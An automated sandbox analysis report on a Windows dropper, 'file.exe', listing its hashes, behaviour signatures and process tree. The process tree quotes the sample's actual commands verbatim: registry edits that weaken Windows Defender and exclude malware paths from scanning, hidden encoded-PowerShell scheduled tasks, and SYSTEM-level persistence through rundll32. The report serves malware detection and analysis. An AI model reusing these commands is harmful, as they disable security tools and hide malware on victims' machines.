Analysis
-
max time kernel
121s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
-
submitted
24-09-2022 08:06
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
41fd50bcd68c5a987282082753fe4650
-
SHA1
2f5c5e5cd680412a01212986f99c6b85808078aa
-
SHA256
f79669d34e38545d8c1904b88aa4f9b9ecd9312f98a39c1fec1bc3bacf3f4897
-
SHA512
f5f1c75fbff98645318ec817e3b74163cd1bfef9cd1e26d31040077d421ae68caab73e90ba665af31bf680367556f3bb6d2980844737516d6a466232478647c6
-
SSDEEP
196608:91OSuiOHmQAEO5tQ51Rzg3ricHwdPCjmsLAXt/qaiiSAavY/5KiT/lA:3OhdGQE05vSrwPCqsLyhq7AumLlA
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Executes dropped EXE 4 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Drops file in System32 directory 31 IoCs
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 41 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC5B6.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC911.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gszDowQvQ" /SC once /ST 02:59:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gszDowQvQ"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gszDowQvQ"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bNHXguvSZYiOwSiXLC" /SC once /ST 08:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\GThEBwa.exe\" 3x /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\GThEBwa.exeC:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\GThEBwa.exe 3x /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ATZmuaBwNwmU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ATZmuaBwNwmU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QYiUKrukFVUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QYiUKrukFVUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SHsJRQZsU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SHsJRQZsU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aJAQLsoDkiWqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aJAQLsoDkiWqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fxkldoUMcXUSOxVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fxkldoUMcXUSOxVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MYjwJFnMfsmfKHMw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MYjwJFnMfsmfKHMw\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fxkldoUMcXUSOxVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fxkldoUMcXUSOxVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MYjwJFnMfsmfKHMw /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\MYjwJFnMfsmfKHMw /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gMsuELkHB" /SC once /ST 02:03:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gMsuELkHB"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gMsuELkHB"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VgOpnHVQDAdMZqNFB" /SC once /ST 07:51:58 /RU "SYSTEM" /TR "\"C:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\MUsoMHG.exe\" aF /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "VgOpnHVQDAdMZqNFB"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\MUsoMHG.exeC:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\MUsoMHG.exe aF /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bNHXguvSZYiOwSiXLC"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\SHsJRQZsU\IMONHe.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "DNDvMcbpefrYjKZ" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
